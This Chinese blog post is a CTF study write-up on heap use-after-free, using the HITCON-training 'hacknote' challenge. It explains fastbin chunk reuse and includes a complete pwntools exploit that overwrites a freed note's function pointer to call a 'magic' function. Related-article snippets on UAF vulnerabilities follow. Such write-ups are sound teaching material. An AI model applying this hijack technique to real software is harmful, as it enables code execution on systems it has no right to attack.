【堆漏洞-Use after free】

于 2023-04-06 20:01:19 发布
阅读量146 收藏
点赞数
文章标签: 系统安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52343643/article/details/126586871
版权

Use After Free

原理

释放堆时没有将堆指针设为NULL,使得可以继续使用这个堆指针操作空中(执行或修改)释放堆中的内容

实例 - HITCON-training hacknote

函数分析

  1. add_note:创建堆,结构由put指针和content指针构成,put指针指向一个打印函数,content指向堆内容,同时为堆添加内容
  2. print_note:打印堆的content内容
  3. delete_note:free 堆结构指针和content堆指针,但并未给指针设为NULL
堆结构
struct note{
	int* put;
	char* content;
}

利用思路

程序中有一个magic函数,可以直接获取到flag,但是如何才能执行magic函数?我们知道堆结构中的put指向一个函数,那么如果我们能修改put指针使其指向magic函数的话,我们print_note的时候就可以指向magic了

具体思路

每创建一个note会实际创建两个堆,大概结构如下

   +-----------------+   <-- note                    
   |   put           |                       
   +-----------------+                       
   |   content       |       size              
   +-----------------+------------------->+----------------+  <-- content
                                          |     real       |
                                          |    content     |
                                          |                |
                                          +----------------+
  1. 创建两个堆note0,note1,且content堆的size(可以是0x10)要与堆结构的大小 (0x8) 不同
  2. 释放两个堆note0,note1,此时大小为0x10的fast bin链表中就存放了note0<-note1
  3. 再创建一个0x8的content堆,即note2(和堆结构大小相同),note2会被分配到note1的位置,而content堆会被分配到note0的位置
  4. 只需要向note2的content(也是note0)写入magic函数地址,因为note0指针还存在,那么我们继续操作(打印)note0就可以指向magic函数

EXP

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *

r = process('./hacknote')


def addnote(size, content):
    r.recvuntil(":")
    r.sendline("1")
    r.recvuntil(":")
    r.sendline(str(size))
    r.recvuntil(":")
    r.sendline(content)


def delnote(idx):
    r.recvuntil(":")
    r.sendline("2")
    r.recvuntil(":")
    r.sendline(str(idx))


def printnote(idx):
    r.recvuntil(":")
    r.sendline("3")
    r.recvuntil(":")
    r.sendline(str(idx))


gdb.attach(r)
magic = 0x08048986

addnote(32, "aaaa")
addnote(32, "ddaa")

delnote(0)
delnote(1)

addnote(8, p32(magic))

printnote(0)

r.interactive()
annEleven
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
释放重引用(Use After Free,UAF)漏洞原理
weixin_41487541的博客
12-21 1175
释放重引用漏洞就是使用到已被释放的内存,最终导致内存崩溃或任意代码执行的漏洞。UAF漏洞在浏览器中最常见,比如IE、Chrome、Firefox等。
车联网开源组件BusyBox漏洞分析及复现(CVE-2022-30065)
蛇矛实验室
02-21 905
近日,国内多家安全实验室检测到了针对于智能网联汽车中使用都开源项目busybox漏洞,国外在2022年5月份报告了此漏洞,目前已经发布的CVE信息如下,信息中指出Busybox1.35-x版本中,awk应用由于use after free导致拒绝服务漏洞或可能获取代码执行权限。
use-after-free漏洞-hacknote
qq_43390703的博客
10-17 1140
hacknote 经典的use-after-free漏洞。 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存
Linux内核中段伪例,利用Linux内核里的Use-After-Free(UAF)漏洞提权
weixin_34405084的博客
04-30 357
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。* 作者:nickchang上个月爆出的CVE-2016-0728 (http://www.freebuf.com/vuls/93799.html)本地提权漏洞让大家的目光又一次聚焦在linux内核安全上。和CVE-2015-3636,CVE-2015-7312,CVE-2014-2...
use-after-free漏洞发现之旅use-after-free漏洞发现之旅
weixin_33851177的博客
03-20 648
2019独角兽企业重金招聘Python工程师标准>>> ...
eu-16-Wen-Use-After-Use-After-Free-Exploit-UAF-By-Generating
08-29
【 eu-16-Wen-Use-After-Use-After-Free-Exploit-UAF-By-Generating 】这篇内容主要探讨了网络安全中的一个重要问题:Use-After-Free (UAF) 漏洞的利用和防御策略。作者Guanxing Wen是一名在Pangu LAB工作的安全研究...
玩转-漏洞的利用技巧.docx
01-10
溢出的利用技术包括 Use After Free & Double Free、Heap Overflow、Fast bin attack、Unsorted bin attack、Overwrite Topchunk、Classical&Modern Unlink Attack、Off by one & Off by null 等。其中,Use After...
信息安全_数据安全_eu-16-Wen-Use-After-Use-After-Fr.pdf
08-22
对于“use-after-free漏洞,其利用过程与溢出类似。通过精心安排的内存布局,使易受攻击的对象在“free”后被释放,并用可控的Vector数据占据。当悬挂指针的成员函数被调用时,就可实现完全可控的内存写入,...
漏洞的利用技巧1
08-03
利用技巧方面,溢出可以利用Use After Free和Double Free等技术。Use After Free是指在释放内存后仍然使用该内存,这可能导致任意地址读写或者控制流劫持。例如,通过重新分配已释放的内存并控制其内容,可以使得...
漏洞之uaf1
08-04
漏洞之uaf1是指use after free(使用后释放)漏洞的一种形式,即程序释放了某个内存块,但在释放后还继续使用该内存块,导致程序崩溃或出现意外情况。这种漏洞可以被利用来控制程序的执行流程,例如覆盖函数指针来...
滤波器UAF42原理及应用
12-04
本文档提供滤波器UAF42的详细介绍,它具有涉及方便,使用灵活的特点。
未初始化UAF漏洞
04-26
释放重引用(UAF)或者未初始化漏洞题目,
cve-2015-3636
qq_37439229的博客
02-09 469
cve-2015-3636 CVE-2015-3636是一个Android系统上可通用的root提权漏洞 复现的kernel版本:3.14,编译时将补丁去除了 漏洞概述 该漏洞属于Linux Kernel级别的use-after-free漏洞,存在于Linux内核的ping.c文件中。当用户态调用系统调用socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP),用返回的socket文件描述符作为参数调用系统调用connect(),并且connect的第二个参数中sa_family
安全狗漏洞通告:Mozilla Firefox Use-after-free漏洞解决方案
bocco的博客
03-07 2816
近日,安全狗应急响应中心监测到Mozilla发布安全公告,修复了Firefox、Firefox ESR、Firefox for Android、Focus和Thunderbird中2个被积极利用的0 day漏洞(CVE-2022-26485和CVE-2022-26486)。
栈上的舞蹈之释放重引用(UAF) 漏洞原理实验分析
墨鱼菜鸡
04-23 476
0x01 前言 释放重引用的英文名名称是 Use After Free,也就是著名的 UAF 漏洞的全称。从字面意思可以看出 Af...
UAF漏洞利用原理分析
qq_29317353的博客
12-25 868
二进制安全,UAF漏洞分析学习
UAF漏洞
m0_60584218的博客
02-27 2619
UAF漏洞 Use After Free 我们可以直接从字面上翻译它的意思:使用被释放的内存块。其实当一个内存块被释放之后重新使用有如下几种情况: 内存块被释放后,其对应的指针被设置为NULL,再次使用时程序会崩溃 内存块被释放后,其对应的指针没有被设置为NULL,在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序有可能可以正常运转 内存块被释放后,其对应的指针没有被设置为NULL,但是在下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能出现问题。 D
pwnable.kr-uaf WP
Casuall的博客
06-22 497
UAF(Use After Free)释放后重用,其实是一种指针未置空造成的漏洞。 首先介绍一下迷途指针的概念 在计算机编程领域中,迷途指针,或称悬空指针、野指针,指的是不指向任何合法的对象的指针。 当所指向的对象被释放或者收回,但是对该指针没有作任何的修改,以至于该指针仍旧指向已经回收的内存地址,此情况下该指针便称迷途指针。若操作系统将这部分已经释放的内存重新分配给另外一个进程,而原来的程序重...
use after free 引起KE
兰宝的专栏
10-12 792
问题背景: 待机状态下,按Power键或者自动进入休眠,必现KE。 分析过程: 取出mtklog看到有db产生,确实发生了KE(kernel exception),取出db和vmlinux (必须是和当前软件是同一次编译的)后,使用GAT工具解开db,取出SYS_MINI_RDUMP,使用 gdb调试: $ arm-linux-androideabi-gdb v
heap-use-after-free
最新发布
09-06
heap-use-after-free是一种常见的相关漏洞,它在程序中利用了一个已经被释放的内存。当我们释放内存后,如果不小心继续使用已经释放的内存,就会导致heap-use-after-free漏洞。 当一个内存被释放后,它会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值